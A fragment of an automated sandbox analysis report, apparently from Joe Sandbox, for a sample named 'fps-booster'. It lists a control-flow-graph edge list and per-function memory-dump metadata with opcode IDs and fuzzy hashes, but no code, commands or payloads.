              control_flow_graph 2620 b2f5e3a-b2f5e40 2621 b2f5eb8-b2f5ec0 2620->2621 2622 b2f5e42-b2f5e80 2620->2622 2626 b2f5f3b 2621->2626 2627 b2f5ec2-b2f5ecb 2621->2627 2637 b2f5e93-b2f5eb0 2622->2637 2638 b2f5e82-b2f5e90 2622->2638 2628 b2f5f3f-b2f5f41 2626->2628 2629 b2f5ecc-b2f5ef0 2627->2629 2628->2629 2630 b2f5f42-b2f5f49 2628->2630 2639 b2f5ef8-b2f5efe 2629->2639 2635 b2f5f4b-b2f5f5c 2630->2635 2636 b2f5f78-b2f5fa4 2630->2636 2640 b2f5f5e-b2f5f60 2635->2640 2641 b2f5f62-b2f5f64 2635->2641 2665 b2f5fb7-b2f5fc0 2636->2665 2666 b2f5fa6-b2f5fb4 call b2f5c98 2636->2666 2637->2621 2642 b2f5fcb-b2f5fcf 2639->2642 2643 b2f5f04-b2f5f0f 2639->2643 2645 b2f5f69-b2f5f75 2640->2645 2641->2645 2646 b2f5ff7-b2f5ffb 2642->2646 2647 b2f5fd1-b2f5fd3 2642->2647 2643->2642 2654 b2f5f15-b2f5f19 2643->2654 2645->2636 2650 b2f5ffd-b2f6023 2646->2650 2651 b2f602b-b2f6036 2646->2651 2647->2646 2652 b2f5fd5-b2f5fef 2647->2652 2650->2651 2652->2646 2654->2642 2658 b2f5f1f-b2f5f29 2654->2658 2661 b2f5f2b-b2f5f34 2658->2661 2662 b2f5f36-b2f5f3c 2658->2662 2661->2628 2662->2628 2665->2642 2666->2665
              Memory Dump Source
              • Source File: 00000000.00000002.2493943359.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_b2f0000_fps-booster.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 040fb0e278dba9002a7c31cb8b7c8e5e05d9e45a6fef3eef7af3bad045344f46
              • Instruction ID: 250a9ec64634641df35edd246086d9586dca7e3c1fd6b5ccdd550efc6b3bdfca
              • Opcode Fuzzy Hash: 040fb0e278dba9002a7c31cb8b7c8e5e05d9e45a6fef3eef7af3bad045344f46
              • Instruction Fuzzy Hash: 3751C134A1020ADFCB05DF68C894AAEBFF2FF99310F1045ADEA069B361D7319941CB90
              Function 0B2F33A8 Relevance: .1, Instructions: 136COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2493943359.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_b2f0000_fps-booster.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 05e42a2d102acb18c5bd84592863be1e27cfcbced8a4bb8360d8239755c2aca5
              • Instruction ID: 086e144e2008824e221db9d9e1a4ccf1827c7798b334eb8c3cf8ed2a889315c0
              • Opcode Fuzzy Hash: 05e42a2d102acb18c5bd84592863be1e27cfcbced8a4bb8360d8239755c2aca5
              • Instruction Fuzzy Hash: 14510B74A00219DFDB05EBE4D864AEEBFB2FF99301F104419E5066B3A1DA392D45CF61
              Function 0B2F0A80 Relevance: .1, Instructions: 130COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2493943359.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_b2f0000_fps-booster.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: f074beda530d5b188912dcb9ba48196b82262b02774a69fe8b87dce8898db920
              • Instruction ID: a7638084b3cfc62eecc2a0b7ac79c21494477251da20d1abdec5ff22c7ef3987
              • Opcode Fuzzy Hash: f074beda530d5b188912dcb9ba48196b82262b02774a69fe8b87dce8898db920
              • Instruction Fuzzy Hash: 2E41B131B1124A8FDB24DFB4E594AEEBBB2EF85315F100479E605A7395CB369C44CB60
              Function 0B2F3E31 Relevance: .1, Instructions: 126COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2493943359.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_b2f0000_fps-booster.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 314798167ff2b4111b71d688f6c27fab219b71342cc75832501a79182a708357
              • Instruction ID: 740329979f456ed9e1100db498226c503333dda731e293da359b1c8615cea997
              • Opcode Fuzzy Hash: 314798167ff2b4111b71d688f6c27fab219b71342cc75832501a79182a708357
              • Instruction Fuzzy Hash: 79416D75A10618DFCB05EFA8D8949EDBBB5FF49310F11426AF602EB360EB31A845CB50
              Function 0B2FAE61 Relevance: .1, Instructions: 126COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2493943359.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_b2f0000_fps-booster.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: ac6c6bf696c7540d39c1d143eaef326792a5098e85f87c7a0bd60bae0bcc47b1
              • Instruction ID: d45c4313ccfee4cfa0868112182fff0e5bfdb9a1f34240410f41f5f9b282baf9
              • Opcode Fuzzy Hash: ac6c6bf696c7540d39c1d143eaef326792a5098e85f87c7a0bd60bae0bcc47b1
              • Instruction Fuzzy Hash: 3A512634D12249DFCB05DFB4E29889DBBB6FF49301F5045A9E902A3780DB35A942CFA1
              Function 0B2F5ED0 Relevance: .1, Instructions: 115COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2493943359.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_b2f0000_fps-booster.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 0f5ee5d256a26e66518a6febf4d59d614e8ca2bdbacabfb31ea17790101e8831
              • Instruction ID: db41339f5e52ad4db19191754da4760ffec6a72078277ef1ad40227edd61667f
              • Opcode Fuzzy Hash: 0f5ee5d256a26e66518a6febf4d59d614e8ca2bdbacabfb31ea17790101e8831
              • Instruction Fuzzy Hash: B7411934A1020ADFCB11DFA8D484AAEBBF5FF59314F104569EA059B761D734E981CF90
              Function 0B2FAE70 Relevance: .1, Instructions: 110COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2493943359.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_b2f0000_fps-booster.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 980fac3e3c95c948f7782aa8b0a756dcd4701d3b3360fe7209c74aa89615954c
              • Instruction ID: d5fcb28c1378cd2f011e7e3c561d756727f2850f1e17ff29a4d87211b335e261
              • Opcode Fuzzy Hash: 980fac3e3c95c948f7782aa8b0a756dcd4701d3b3360fe7209c74aa89615954c
              • Instruction Fuzzy Hash: 4651E834D12209DFCB05DFB4E24889DBBB6FF48311F6045A9E902A3750DB35A982CFA0
              Function 0B2F5C98 Relevance: .1, Instructions: 108COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2493943359.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_b2f0000_fps-booster.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 2fea7fb4eefa4de90090e57ee8b9b2fe9742aa19bc8085bdff5f565e53c9e3e2
              • Instruction ID: 7f9cb1c4ad94913ab1e08065b00b6e3e0ecfd1d82f31d679c561aedbf9332a15
              • Opcode Fuzzy Hash: 2fea7fb4eefa4de90090e57ee8b9b2fe9742aa19bc8085bdff5f565e53c9e3e2
              • Instruction Fuzzy Hash: 2131E6317212178FCB15EB38D8A467EBBE5FF89340B148579D906DB388EB74AC4187A1
              Function 0B2F5C8A Relevance: .1, Instructions: 98COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2493943359.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_b2f0000_fps-booster.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 3d5549863763b7fa27768deb0185320486f00bd4e0a2f0e6dcf511142d0327d7
              • Instruction ID: ffe088ba8cbfa878cb8a8b28476f3076e5e67439c2a847e10ca8ec08bd51998a
              • Opcode Fuzzy Hash: 3d5549863763b7fa27768deb0185320486f00bd4e0a2f0e6dcf511142d0327d7
              • Instruction Fuzzy Hash: 7731D5317222538FCB15EB38E4D467EBBE6BF89340B148569DD06DB388EB349C418B91
              Function 0B2F1700 Relevance: .1, Instructions: 93COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2493943359.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_b2f0000_fps-booster.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 9132f5018a6658bd1cb8b84635a66732a14badb66806942a44b8dbefb8120600
              • Instruction ID: 20dbbded01d7962baf7f947e601a9d3efeea2cabea01d115bdaced9ec4e2ad8c
              • Opcode Fuzzy Hash: 9132f5018a6658bd1cb8b84635a66732a14badb66806942a44b8dbefb8120600
              • Instruction Fuzzy Hash: B2317530610702CFD725DF39D580A56B7F2FF897117608A2DE58A8BAA5D771F846CB40
              Function 0B2F1DE8 Relevance: .1, Instructions: 93COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2493943359.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_b2f0000_fps-booster.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 9e0075b835e4fcdcc74217b431fe28ee70a7b1fdaff78e8ccf7668432508276d
              • Instruction ID: 77b5e184448f42f3d3d7ef86f3bde7638e48ccac2c77ef2528cf765d2d92b64e
              • Opcode Fuzzy Hash: 9e0075b835e4fcdcc74217b431fe28ee70a7b1fdaff78e8ccf7668432508276d
              • Instruction Fuzzy Hash: EC31F431F042158FCB159B69C4A8AAEBFF2EF89711F54417AE901EB3A1CE754C05CBA1
              Function 0B2F1390 Relevance: .1, Instructions: 87COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2493943359.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_b2f0000_fps-booster.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: f7963b42404b411f14e5c221d259681debe0b5bf66be667d25db4871495bce68
              • Instruction ID: db6550549a37e8769af232af0cf0f1f316ba4994f425781de29f2ef22ad6043d
              • Opcode Fuzzy Hash: f7963b42404b411f14e5c221d259681debe0b5bf66be667d25db4871495bce68
              • Instruction Fuzzy Hash: A5313A35B10209CFCB14CB98D998AEDBBB6FF88315F184069E606B73A5CB35AC51CB51
              Function 0B2F28E8 Relevance: .1, Instructions: 79COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2493943359.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_b2f0000_fps-booster.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 49e57f9f8bbfa382776367e4c41167d88e238fa6a88e0f38d522a47e771932b6
              • Instruction ID: 96ee6dcfbbad4e9fda5ba4c8e0c0910b95a3b3d21bbf562d574a1a36087a2dda
              • Opcode Fuzzy Hash: 49e57f9f8bbfa382776367e4c41167d88e238fa6a88e0f38d522a47e771932b6
              • Instruction Fuzzy Hash: 0421B3317042058FD714DB6DE49496A7BE7EFCE310728486DE246CB356DB24DC028B51
              Function 0B2FB5F8 Relevance: .1, Instructions: 77COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2493943359.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_b2f0000_fps-booster.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: f7cd97afdcf7f7751aaf73d3d8bac7ccff1dd6b8f928a94f392076341be1ed62
              • Instruction ID: fcc374da705c97000d75c20710c67353271baaac5daf711ce9e6e70491191252
              • Opcode Fuzzy Hash: f7cd97afdcf7f7751aaf73d3d8bac7ccff1dd6b8f928a94f392076341be1ed62
              • Instruction Fuzzy Hash: 06213274A21218DFDB05ABB8E868BAE7BB6BF98700F110428E506E7385EE345D41CF55
              Function 0102D5CC Relevance: .1, Instructions: 75COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2483971168.000000000102D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0102D000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_102d000_fps-booster.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: a06cb6ae91a0ed86526447d72a9fc41c76b985b76b300fc1e5213619bea8dcd3
              • Instruction ID: 96d5094f7ea308b9c185edbbb4071fce1ca6d89dd223add5fde77de1b6f776a6
              • Opcode Fuzzy Hash: a06cb6ae91a0ed86526447d72a9fc41c76b985b76b300fc1e5213619bea8dcd3
              • Instruction Fuzzy Hash: E92148B1504244EFDB15DF94D9C4B1ABFA1FB88314F2085ADD9490B247C336D856CBA1
              Function 0B2F5638 Relevance: .1, Instructions: 70COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2493943359.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_b2f0000_fps-booster.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 02a937a39b84dabf04e046ecf8ad1e488119952bc658d351a3c0296e523896f6
              • Instruction ID: afe71bf04f1d80aed035c7a3b51cee70d6177649e8e64fbaac5d4a27fe2bf388
              • Opcode Fuzzy Hash: 02a937a39b84dabf04e046ecf8ad1e488119952bc658d351a3c0296e523896f6
              • Instruction Fuzzy Hash: F61127313092545FD705577A986496BBFE7EFCA220719817FE50ACB3A2CD388C01C3A5
              Function 0B2F5BDF Relevance: .1, Instructions: 64COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2493943359.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_b2f0000_fps-booster.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: b9f38068a684e9e87261e0d1bedfd728023be0d299e8c835ba0db032b708280d
              • Instruction ID: 225f71e28e61252ea52b9824abe6dece8db9a8215dba36436dcdf326f849923c
              • Opcode Fuzzy Hash: b9f38068a684e9e87261e0d1bedfd728023be0d299e8c835ba0db032b708280d
              • Instruction Fuzzy Hash: E011D670A107168FC721DF68E8944EEFFF4EF887007004529E946EB354DB749A058BA0
              Function 0B2F148E Relevance: .1, Instructions: 63COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2493943359.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_b2f0000_fps-booster.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: d9e5db3f124fa8d25f9ede708d7dc65c312c3e19ce57a4d06b924ffed906d589
              • Instruction ID: bb5aa726b50b6b371f500d10d2906784d1cb544412cf722ed8784331e75d495c
              • Opcode Fuzzy Hash: d9e5db3f124fa8d25f9ede708d7dc65c312c3e19ce57a4d06b924ffed906d589
              • Instruction Fuzzy Hash: F7210738B101198FDB44DBA8D494E99B7F6BF89315F1140A4EA05EB3A6DA75EC01CF60
              Function 0B2F1DE3 Relevance: .1, Instructions: 58COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2493943359.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_b2f0000_fps-booster.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 7e2ebb4c0254228d5ef6e716a8ccafabfba9931a9bf14b395c4e2c3a5f06bfb0
              • Instruction ID: b156196704fbef6aff3b364d5d698040ca0f0add71c706c95086e2cc05e5cfdc
              • Opcode Fuzzy Hash: 7e2ebb4c0254228d5ef6e716a8ccafabfba9931a9bf14b395c4e2c3a5f06bfb0
              • Instruction Fuzzy Hash: 4A11A970E00115DFCB15DB68C098AADBBF2AF8C311F14406AE902FB3A5CA715C42CBA0
              Function 0102D5C7 Relevance: .1, Instructions: 56COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2483971168.000000000102D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0102D000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_102d000_fps-booster.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 77fadd82fdc2d56cf39070efea1a70d2bd0433e89b8e3a9964b57efaebe0ac53
              • Instruction ID: 38f0414ecb6873ddfa9c84b8ae79a1d461ccaa8700357fba89701de559fc6409
              • Opcode Fuzzy Hash: 77fadd82fdc2d56cf39070efea1a70d2bd0433e89b8e3a9964b57efaebe0ac53
              • Instruction Fuzzy Hash: B611E172504244DFDB12CF54D5C4B16BFB2FB88314F24C6A9D8490B257C33AD85ACBA2
              Function 0B2F6110 Relevance: .0, Instructions: 47COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2493943359.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_b2f0000_fps-booster.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 27e90c1212ddb40ebbcc8cdb6eb2a0bb3c033eaa9f0ff8cacfe78f5db8db342d
              • Instruction ID: 338ee298a19b241eb0881e906b4e9ccbbafa87a9ecf3ad87edc15c6d4b7b084f
              • Opcode Fuzzy Hash: 27e90c1212ddb40ebbcc8cdb6eb2a0bb3c033eaa9f0ff8cacfe78f5db8db342d
              • Instruction Fuzzy Hash: 8A01287061D1854FC31A9B78D4949AABFA1EF46300F140DEEC6948F7A3CA616C15CB42
              Function 0B2F1485 Relevance: .0, Instructions: 44COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2493943359.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_b2f0000_fps-booster.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 685ff58c67b76bb8e2ac1f41a6a2adc2147931ebe900d60609901ce7bcbdcb29
              • Instruction ID: a125fd86fa6bbb7a407cfdc1744abaac257f28b31b628d9e2fcd4783a3084464
              • Opcode Fuzzy Hash: 685ff58c67b76bb8e2ac1f41a6a2adc2147931ebe900d60609901ce7bcbdcb29
              • Instruction Fuzzy Hash: 50119E79A10119CFDB44DF68D884E99B7F1FF89325F2140A4E905AB362CA75ED41CF60
              Function 0B2F2864 Relevance: .0, Instructions: 43COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2493943359.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_b2f0000_fps-booster.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: fa69eaed097bc893b2c9eef2bb92d0e5dd19f70ac9a16450e47f64a7d0ce87c9
              • Instruction ID: 6cc363e6c7a5f70d493918064aa15a048faa207bb03d80c089a0f9b9e5adb1c1
              • Opcode Fuzzy Hash: fa69eaed097bc893b2c9eef2bb92d0e5dd19f70ac9a16450e47f64a7d0ce87c9
              • Instruction Fuzzy Hash: 03F028312093925FC717A67CA8B09DE7FA1EEC735430405AFE089CF242CA58980983A2
              Function 0B2F39D8 Relevance: .0, Instructions: 42COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2493943359.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_b2f0000_fps-booster.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 9b32e67ccc81914f8d080e85778a2e91fc626e18324ba2617ebd75924e21bc13
              • Instruction ID: 27937bf6174771beaee3db8e248d2c43d0fe38d13fb5b079a440231d50ac4d60
              • Opcode Fuzzy Hash: 9b32e67ccc81914f8d080e85778a2e91fc626e18324ba2617ebd75924e21bc13
              • Instruction Fuzzy Hash: 4001F7302043515FC722AB78A4A06AE7FE3EFD63157044A1DE14A8F761DB79180987A1
              Function 0B2F28D9 Relevance: .0, Instructions: 38COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2493943359.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_b2f0000_fps-booster.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: ed02a8ad12986f6456fa0196b609d4f85067ebbd33cd1c92cfcfd8faf1933901
              • Instruction ID: dd4613c0e302139bdca98bdc26f6c77e3d80ca8c116eca9113942c7947cbff76
              • Opcode Fuzzy Hash: ed02a8ad12986f6456fa0196b609d4f85067ebbd33cd1c92cfcfd8faf1933901
              • Instruction Fuzzy Hash: 82F096302042568FC719DB3DE8E0DA97BE5EFCA300315466DE145CF652DB20AC05C750
              Function 0B2F1548 Relevance: .0, Instructions: 38COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2493943359.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_b2f0000_fps-booster.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 78ff9c8667b2ad566d28759aac53dca659c9aa597d822ecbcb8fb565703b7a2e
              • Instruction ID: b5eee2eed672ac1f236a6d2414ed056b79e44096f3b3ca21ca51449088e9b397
              • Opcode Fuzzy Hash: 78ff9c8667b2ad566d28759aac53dca659c9aa597d822ecbcb8fb565703b7a2e
              • Instruction Fuzzy Hash: BAF0C231321291CFD319DF34F55586A7BB2AF8271534009BFE9468B285CB30AC45CBA1
              Function 0B2F3A91 Relevance: .0, Instructions: 34COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2493943359.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_b2f0000_fps-booster.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: ec6311f42793187eb70b8161cbb366103dd6e10354af16f4436fd65b789750a0
              • Instruction ID: 67c7d211a5e4b30249fb88ae99c977bfcd64b259632bf15b8ed088e995c83fc2
              • Opcode Fuzzy Hash: ec6311f42793187eb70b8161cbb366103dd6e10354af16f4436fd65b789750a0
              • Instruction Fuzzy Hash: 93F0B4312046618FCB05EB7CF4B09E97BB3EF8621070545AFC18A8F556DB65680AC752
              Function 0B2F0437 Relevance: .0, Instructions: 34COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2493943359.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_b2f0000_fps-booster.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 57c3f1b6041cce473ec02ea6f563149e464dd0ae047df4af02f440c8f507f456
              • Instruction ID: 1679f84d4b6b37b0cfdd5c1260587b5156a4ff7b83a2ec54617ae562c788b236
              • Opcode Fuzzy Hash: 57c3f1b6041cce473ec02ea6f563149e464dd0ae047df4af02f440c8f507f456
              • Instruction Fuzzy Hash: BCF0E932F052909FC711DF7894442D57FF1FF8622070849FAC544C7681EA308806C791
              Function 0B2F3AC8 Relevance: .0, Instructions: 33COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2493943359.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_b2f0000_fps-booster.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 07da51ef77e5aa55f89cdb2c98d19ff2009e2c115c5d5e589b16cee5944983a8
              • Instruction ID: 989d511b8a1304598e72f494ee58c67aa0207f2efb4e1000fe810e01be28cdc8
              • Opcode Fuzzy Hash: 07da51ef77e5aa55f89cdb2c98d19ff2009e2c115c5d5e589b16cee5944983a8
              • Instruction Fuzzy Hash: C6F03A307052428BC721DB6CE8B09AA7BA6AFC925030946AEE146CF665EB64DC058755
              Function 0B2F1EB7 Relevance: .0, Instructions: 33COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2493943359.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_b2f0000_fps-booster.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 76bc7909d194a53e56867f49892d7728c1485b8f51c1675b8290993bc4d6d8b1
              • Instruction ID: e0a8c5096a232b15fab2e4dc7736afe62608b8d510ea925a83cfc0a1ebda510e
              • Opcode Fuzzy Hash: 76bc7909d194a53e56867f49892d7728c1485b8f51c1675b8290993bc4d6d8b1
              • Instruction Fuzzy Hash: 74F0AB3670E3504FC3231334A82889E6FB68FC661131900BEE801CB392CEA88C06C7A2
              Function 0B2F56AB Relevance: .0, Instructions: 29COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2493943359.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_b2f0000_fps-booster.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 16cb3e2fbebe2487bda3c6e45ae514f836977b0c38135dd6f492b85a2033032c
              • Instruction ID: 70e68aaca0982bf3afcdf2f4f3fd9d4ffbd20f6fb6dd5cef5e527fae23218805
              • Opcode Fuzzy Hash: 16cb3e2fbebe2487bda3c6e45ae514f836977b0c38135dd6f492b85a2033032c
              • Instruction Fuzzy Hash: E3E065357152409FC311976E9898CA6BFE5EFCA72431541AEF546C7362C9719C10C750
              Function 0B2F55D8 Relevance: .0, Instructions: 29COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2493943359.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_b2f0000_fps-booster.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 5072577ccbdd7e39ec70a5da84a6a21fcbc8e7a0baa47899bc28527e7b2db5b4
              • Instruction ID: 06bbca4ac747b303cd8e501b6771e27121a6b8cb129607b219b1840a50f0cc4b
              • Opcode Fuzzy Hash: 5072577ccbdd7e39ec70a5da84a6a21fcbc8e7a0baa47899bc28527e7b2db5b4
              • Instruction Fuzzy Hash: 1FE022352542509FC704BB7AF970E263F69FFCAB10B0540AAE085CB395CA206D05C3A2
              Function 0B2F1FE2 Relevance: .0, Instructions: 28COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2493943359.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_b2f0000_fps-booster.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: a62e0373682216898f66f52230167234b8a0c8574b1b1f149dede22896f8b32e
              • Instruction ID: 0a523de3aa24aec9e99602c3e7075a39d1d46d4d89b3aa7569fba9415fbd7cff
              • Opcode Fuzzy Hash: a62e0373682216898f66f52230167234b8a0c8574b1b1f149dede22896f8b32e
              • Instruction Fuzzy Hash: 36E0D8363092645F8706576C68909797FB6DECF95530601AFF006CF242C9550C05C761
              Function 0B2F29E8 Relevance: .0, Instructions: 23COMMON
              Download Yara Rule
              Memory Dump Source
